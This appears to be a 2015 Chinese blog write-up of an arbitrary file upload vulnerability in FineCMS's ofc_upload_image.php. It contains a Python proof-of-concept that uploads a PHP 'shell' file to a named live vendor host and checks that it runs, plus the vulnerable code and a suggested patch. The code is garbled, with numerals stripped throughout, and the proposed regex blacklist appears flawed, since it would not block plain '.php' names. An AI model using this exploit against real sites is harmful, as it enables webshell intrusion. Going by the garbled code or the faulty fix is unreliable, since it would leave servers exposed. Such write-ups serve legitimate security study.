FIneCMS /dayrui/libraries/Chart/ofc_upload_image.php Arbitrary File Upload Vul

catalog

. 漏洞描述
. 漏洞触发条件
. 漏洞影响范围
. 漏洞代码分析
. 防御方法
. 攻防思考

1. 漏洞描述

Relevant Link:

http://www.wooyun.org/bugs/wooyun-2015-0105251


2. 漏洞触发条件

0x1: POC

#!/usr/bin/env python
# -*- coding: utf- -*-
#__author__ = '1c3z' import urllib2
import random fileName = "shell" + str(random.randrange(,)) + ".php"
target = "http://v1.finecms.net/dayrui/libraries/Chart/ofc_upload_image.php" def uploadShell():
url = target + "?name=" + fileName
req = urllib2.Request(url, headers={"Content-Type": "application/oct"})
res = urllib2.urlopen(req, data="<?print(md5(0x22))?>")
return res.read() def poc():
res = uploadShell()
if res.find("tmp-upload-images") == -:
print "Failed !"
return print "upload Shell success"
url = "http://v1.finecms.net/dayrui/libraries/tmp-upload-images/" + fileName
md5 = urllib2.urlopen(url).read()
if md5.find("e369853df766fa44e1ed0ff613f563bd") != -:
print "poc: " + url poc()


3. 漏洞影响范围
4. 漏洞代码分析

/dayrui/libraries/Chart/ofc_upload_image.php

$default_path = '../tmp-upload-images/';
if (!file_exists($default_path)) mkdir($default_path, , true);
$destination = $default_path . basename( $_GET[ 'name' ] );
echo 'Saving your image to: '. $destination; $jfh = fopen($destination, 'w') or die("can't open file");
fwrite($jfh, $HTTP_RAW_POST_DATA);
fclose($jfh);

程序未对上传文件进行任何后缀、内容的检测和过滤


5. 防御方法

/dayrui/libraries/Chart/ofc_upload_image.php

$default_path = '../tmp-upload-images/';
if (!file_exists($default_path))
mkdir($default_path, , true); $destination = $default_path . basename( $_GET[ 'name' ] ); /* */
if (preg_match('#\.(php|pl|cgi|asp|aspx|jsp|php5|php4|php3|shtm|shtml)[^a-zA-Z0-9]+$#i', trim($destination)))
{
die("你指定的文件名被系统禁止!");
}
/* */ echo 'Saving your image to: '. $destination; $jfh = fopen($destination, 'w') or die("can't open file");
fwrite($jfh, $HTTP_RAW_POST_DATA);
fclose($jfh);


6. 攻防思考

Copyright (c) 2015 LittleHann All rights reserved

上一篇:e2e 自动化集成测试 架构 实例 WebStorm Node.js Mocha WebDriverIO Selenium Step by step (二) 图片验证码的识别


下一篇:LoadRunner中的参数与变量